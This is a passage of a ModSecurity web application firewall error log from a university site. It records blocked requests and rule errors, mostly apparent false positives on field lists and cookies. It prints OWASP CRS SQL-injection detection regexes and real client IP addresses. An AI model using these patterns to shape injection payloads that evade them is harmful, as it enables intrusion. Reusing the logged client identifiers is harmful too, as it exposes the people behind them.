"ZO1a3sCo-f0AAPlpRiMAAAAS"]
[Tue Aug 29 09:41:39.358938 2023] [:error] [pid 63712] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a48Co-f0AAPjgw4EAAAAC"]
[Tue Aug 29 09:41:39.516486 2023] [:error] [pid 63712] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a48Co-f0AAPjgw4IAAAAC"]
[Tue Aug 29 09:41:39.683851 2023] [:error] [pid 63712] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a48Co-f0AAPjgw4MAAAAC"]
[Tue Aug 29 09:41:54.979004 2023] [:error] [pid 63880] [client 114.5.212.176] ModSecurity: Rule 7fe1c6617ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpanambilsks"] [unique_id "ZO1a8sCo-f0AAPmIs2IAAAAU"]
[Tue Aug 29 09:41:59.886613 2023] [:error] [pid 63887] [client 203.176.176.235] ModSecurity: Rule 7fe1ce528160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1a98Co-f0AAPmPSrcAAAAF"]
[Tue Aug 29 09:41:59.886712 2023] [:error] [pid 63887] [client 203.176.176.235] ModSecurity: Rule 7fe1ce528160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1a98Co-f0AAPmPSrcAAAAF"]
[Tue Aug 29 09:42:39.525954 2023] [:error] [pid 63885] [client 203.176.176.235] ModSecurity: Rule 7fe1c6617ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1bH8Co-f0AAPmNDycAAAAC"]
[Tue Aug 29 09:43:59.894398 2023] [:error] [pid 64052] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1bb8Co-f0AAPo0NgcAAAAA"]
[Tue Aug 29 09:43:59.894568 2023] [:error] [pid 64052] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1bb8Co-f0AAPo0NgcAAAAA"]
[Tue Aug 29 09:45:59.904927 2023] [:error] [pid 64066] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1b58Co-f0AAPpCN88AAAAL"]
[Tue Aug 29 09:45:59.905020 2023] [:error] [pid 64066] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1b58Co-f0AAPpCN88AAAAL"]
[Tue Aug 29 09:48:00.346544 2023] [:error] [pid 64057] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1cYMCo-f0AAPo5KtQAAAAH"]
[Tue Aug 29 09:48:00.346620 2023] [:error] [pid 64057] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1cYMCo-f0AAPo5KtQAAAAH"]
[Tue Aug 29 09:49:59.929136 2023] [:error] [pid 64141] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1c18Co-f0AAPqNfBQAAAAK"]
[Tue Aug 29 09:49:59.929225 2023] [:error] [pid 64141] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1c18Co-f0AAPqNfBQAAAAK"]
[Tue Aug 29 09:51:01.678089 2023] [:error] [pid 64166] [client 203.176.176.235] ModSecurity: Rule 7fe1c5e52ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1dFcCo-f0AAPqmcdwAAAAi"]
[Tue Aug 29 09:51:33.582323 2023] [:error] [pid 64165] [client 203.176.176.235] ModSecurity: Rule 7fe1c5e52ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1dNcCo-f0AAPqlIYIAAAAh"]
[Tue Aug 29 09:59:11.856205 2023] [:error] [pid 64274] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1e-8Co-f0AAPsSWkwAAAAH"]
[Tue Aug 29 09:59:11.856292 2023] [:error] [pid 64274] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1e-8Co-f0AAPsSWkwAAAAH"]
[Tue Aug 29 10:00:11.830104 2023] [:error] [pid 64241] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1fO8Co-f0AAPrxgJ8AAAAE"]
[Tue Aug 29 10:00:11.830201 2023] [:error] [pid 64241] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1fO8Co-f0AAPrxgJ8AAAAE"]
[Tue Aug 29 10:01:11.797619 2023] [:error] [pid 64346] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1fd8Co-f0AAPtaj4MAAAAQ"]
[Tue Aug 29 10:01:11.797705 2023] [:error] [pid 64346] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1fd8Co-f0AAPtaj4MAAAAQ"]
[Tue Aug 29 10:03:11.807700 2023] [:error] [pid 64274] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1f78Co-f0AAPsSWoYAAAAH"]
[Tue Aug 29 10:03:11.807788 2023] [:error] [pid 64274] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1f78Co-f0AAPsSWoYAAAAH"]
[Tue Aug 29 10:05:11.808546 2023] [:error] [pid 64354] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1gZ8Co-f0AAPtipeoAAAAF"]
[Tue Aug 29 10:05:11.808620 2023] [:error] [pid 64354] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1gZ8Co-f0AAPtipeoAAAAF"]
[Tue Aug 29 10:07:11.816138 2023] [:error] [pid 64354] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1g38Co-f0AAPtipe0AAAAF"]
[Tue Aug 29 10:07:11.816274 2023] [:error] [pid 64354] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1g38Co-f0AAPtipe0AAAAF"]
[Tue Aug 29 10:09:06.038368 2023] [:error] [pid 64396] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1hUsCo-f0AAPuMLhwAAAAO"]
[Tue Aug 29 10:09:06.038478 2023] [:error] [pid 64396] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1hUsCo-f0AAPuMLhwAAAAO"]
[Tue Aug 29 10:10:06.898545 2023] [:error] [pid 64399] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1hjsCo-f0AAPuPP30AAAAT"]
[Tue Aug 29 10:10:06.898632 2023] [:error] [pid 64399] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1hjsCo-f0AAPuPP30AAAAT"]
[Tue Aug 29 10:13:29.273317 2023] [:error] [pid 64574] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZO1iWcCo-f0AAPw@lioAAAAK"]
[Tue Aug 29 10:13:33.610855 2023] [:error] [pid 64574] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZO1iXcCo-f0AAPw@lisAAAAK"]
[Tue Aug 29 10:13:54.166415 2023] [:error] [pid 64569] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZO1icsCo-f0AAPw51hoAAAAF"]
[Tue Aug 29 10:13:55.972668 2023] [:error] [pid 64569] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZO1ic8Co-f0AAPw51hsAAAAF"]
[Tue Aug 29 10:13:57.390503 2023] [:error] [pid 64569] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZO1idcCo-f0AAPw51hwAAAAF"]
[Tue Aug 29 10:14:01.145344 2023] [:error] [pid 64569] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZO1iecCo-f0AAPw51h0AAAAF"]
[Tue Aug 29 10:14:03.285313 2023] [:error] [pid 64569] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZO1ie8Co-f0AAPw51h4AAAAF"]
[Tue Aug 29 10:14:13.293412 2023] [:error] [pid 64564] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id 